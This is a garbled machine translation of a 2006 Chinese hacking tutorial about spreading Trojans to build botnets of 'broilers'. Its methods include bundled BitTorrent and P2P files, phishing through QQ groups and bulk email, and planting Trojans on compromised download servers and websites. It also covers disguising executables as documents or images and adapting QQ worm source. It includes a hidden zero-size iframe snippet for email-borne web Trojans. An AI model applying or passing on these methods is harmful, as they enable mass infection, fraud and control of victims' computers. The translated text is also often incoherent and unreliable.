Lucene search

K
myhack58佚名MYHACK58:62200610527
HistoryJul 19, 2006 - 12:00 a.m.

Catch broilers collection---the Trojan spread mad grab broiler final stage large package-vulnerability warning-the black bar safety net

2006-07-1900:00:00
佚名
www.myhack58.com
12

This article total section summarizes the currently the most popular Trojan to spread the technology and later the Trojan to spread the technology development trend,

The content is quite rich. I believe after reading this tutorial you’ll become a poultry raiser.

A. Currently popular Trojan propagation techniques.

  1. With BT making the Trojan seed

The use of BT making the Trojan seed of Tutorials online also posted a lot,here mainly looking for a seduction of the software

Then bundle their Trojan horse,made of seeds,final release out. Believe that the use of BT caught the chicken speed but super fast Oh.

  1. Use PP to share your bundle with a Trojan software or movies.

Method with BT,to find the temptation of movies or software,bundle their Trojan horse,and then share your own directory,so that people

Home will search through to find your software or movies. Here the movie to fit the web page Trojan. You can see RealOnePla

ye Trojan production. In Black Hawk you can find. When you open our movie opens we make over the web page wooden

Horse. Such movies would also be in our horses.

  1. The use of QQ mailbox spread Trojans.

Here the main point HTML format----on the inside write the following code:

<body > </body>

When they open you sent the last mail,it will be our Trojan horse.

  1. QQ group hairnet page Trojan.

First, you have to apply for several QQ number, and then find the paragraph QQ message group sending device of the Black Eagle site can find a large number of related QQ group

Send information software, and then to add a very alluring message of broilers and more with less and this is directly related to

That, and Cheat people point to your web site. Finally, in the evening when you can hang on the computer group of the ribbon there is a web page Trojan horse letter

Information. I believe as long as you information in enough temptation, broilers are also hordes.

  1. Use 1 6 3 mailboxes spread of web Trojan.

Similarly, here in HTML format, and then fill in the following code:

</html><iframe src=“your web Trojan address” name=“zhu” width=“0” height=“0”

frameborder=“0”>

Each other as long as the open, it will be in our web page Trojan.

Here to send email when pay attention to some tips, we want to add some social engineering will be. For example, the other is a hobby car,

You’re in the message title to write on about car of temptation of the title. Only one purpose, let him point us with the web page wooden

Horses the mail.

  1. Use of mailbox the bulk of our web page Trojan.

Here use to Forum mailbox extractor, these tools are the Black eagles also have a download, you can find it. Extract a lot

Mailbox, with the FOXMAIL, this software for mass dissemination with web pages the Trojan in the mail. Here also pay attention to the technology.

Clever, such as in a game forum to extract the mailboxes, you’ll be able to camouflage this forum to the majority of game players,provide

The latest game plug-in download. Then write on your own web page Trojan. Most believe that the authenticity of the information and click. From

And in our Trojan. Here you can also with the use of HTML format sending in our web page Trojan horse effect can be better!

  1. Bundle cheat

This is also more commonly used to spread the Trojan technology. The Trojans tied in games,popular software,in conjunction with the above method,QQ,email

Box,BT,forums,etc. release bundle a Trojan in the software. Cheat point our software,so that also at the same time in our wood

Horse. About the bundled technology,I do three very specific and detailed speech animation tutorial. Do not understand can be in Black Hawk search

Looking for I bundle series album tutorial.

  1. Break download point,a sheaf on the Trojan into the download point.

When we invaded to some website,to see if open 2 1 service,that is, whether to offer FTP service. If the invasion to the

Such a website,congratulations you,you can get large quantities of broiler chickens. You can bundle on their own Trojans and then placed into download point

Wait people take the bait! The method of grasping the chicken’s speed is also very fast.

  1. Phishing tricking someone to click on your web Trojan address or Trojans.

Phishing spoofing attack,also is the domestic the latest discovery of an attack technique. The main use of social engineering will trust in

Relationship lie to him click. The specific use of the method:when the pirates took his QQ number,you can see there are several groups,then in groups.

Put on yourself a bundle of Trojans. Next in the group to send a few strips seductively information,such as the latest application 6-digit QQ number software,

Because it is in the same group,maybe they are on the QQ, the owner has a certain degree of trust,so click on the possibility of a certain

Great. If the QQ number owner is the group owner or administrator,ha ha,we come to a more toxic,simply in the Bulletin to write on their own

Web Trojan address,and then say that this group just built a dedicated website! Because it is the main group,their trust in Him can want and

Known. Should will points! There is a trick,in his QQ personal information or personal signatures on the fill on your own page wood

Horses,then that just built a personal website. I believe that many friends will automatically click on it!

1 0. Website home page hanging horse

This should go without specific description of the bar,tutorials N more. Invasion to a website to get WEBSHELL,the next everyone

Is not are busy looking for a home hung it up.

1 1. Forum vulnerabilityhung it to the

Here the main use of the forum some of the holes for hanging horse,such as the recent dynamic network reception to enhance the admin,and then hung it,

Move the network profile through the account of LAX hanging horse,and the vote hung it, and so on. Use these holes to hung it. There are also associated

Tutorial,not very clear in Black Hawk find.

1 2. File type camouflage

This is mainly to put some Trojan service end and some text files bundled together,and then pass after the self-extracting mode or tied

Controller make a text file type of the executable file. But he thought that to open a text file,although can be normal operation

The text file is,in fact, already in our Trojan. Really mysteriously! I also did the file type spoofing

The animation tutorial. Not very clear can also in the Black Hawk or the animation bar to find my tutorials. Of course,also want to

Masquerading as other types,such as the Trojans made into a BMP picture. BAT format, etc. As long as he is a run it will.

Our horses.

1 4. Other propagation techniques:such as making pictures of the Trojan horse,also have a special picture of the Trojan making tool,RM Trojan production

Black Eagle also has tutorials,RealOnePlayer Trojan production,FLASH Trojan production. There are also specialized making tools,

Online you can find the relevant tool. These are also the more common communications technologies. As long as you have this idea,can be

To the Internet to find relevant information,their try to make.

II. New advanced Trojan propagation techniques

The following describes several of the more advanced Trojans dissemination of technology. Due to some technical difficulty,so concealment is relatively strong,

The propagation speed is also fast,but also hardly will be antivirus software killing.

  1. In a WORD document, added Trojan files

This method is very secluded,in a WORD document tail added Trojan files,as long as someone clicks on this so-called WORD file

In the Trojan,this method is mainly by the one the EXE format of the Trojan file access in a DOC file at the end,so that the

Others imperceptible to the Trojan presence,thus making the above when cheated. The specific implementation method,is more complex. Himself in a

Further research among the. I believe in the near this method will pop up. Now the main is some of the masters use.

  1. Hack tool tied to the Trojans

In fact, this was not a high level method,but have recently found a lot of hacker software distribution Station,bundled with a Trojan tool escaped

The administrator of the detection. Still released,imagine the harm have how much. In fact they is the use of human weakness. Hack

The tool would have to be antivirus software killing,bundled with a Trojan tool is killing it don’t feel strange. It will relax their vigilance. From

Is they use. This trick is they put the hacker in social engineering using the"just right"!

  1. Use Z-file camouflage encrypted Trojan program

z-file camouflage encrypted software is Taiwan Hua shun tech product,it through to compress the file after encryption,then to bmp image

The file format is displayed,the extension is bmp,after the execution is the amplitude of the normal image. Hackers will use Trojan horse programs and games.

Together,then use the z-file encryption and this"mixture"to the victims,since the look is an image file,the victim to

To be disapproval,after opening and just a General picture,the most terrible place is also that even the virus also can not be detected

It is hidden within the Trojan.

  1. Disguised as an application extension component

These are among the most difficult to identify a Trojan horse,is quackery of the highest of the Trojans,of course, the technical implementation is also a considerable difficulty

As it relates to programming,so I’m here only a simple introduction to the principles,for reference.

Using the kernel plug-in embedded mode,using the remote insert the thread technology,embedded in the DLL thread,or attached to PSAPI.

Now the Trojan horse program hidden.

  1. By QQ virus,QQ worms,QQ tail or mailbox viruses,worms spread.

Believe the use of these technologies to spread the Trojan’s speed is the fastest. Here to download virus,worm source code. For

Analysis. Modify. Join our web Trojan address. And then spread to the Internet,so it will a pass ten,ten spread hundred,index

Level rise,automatically as we spread the Trojan. This propagation speed is amazing. Online also can find related QQ worm production

Controller,rookie friends can make your own with Web Trojans worms. The recent Tangshan hack is to use

QQ tail spread their Trojans,infected and control four million more civilian computer. Performed on Beijing, a music website

Be distributedDDOSattack. The use of the technology is quite advanced,the speed is also the fastest.

Well,the tutorial on here,it should be fairly comprehensive. These advanced techniques, interested can look at,believe

There will be a harvest.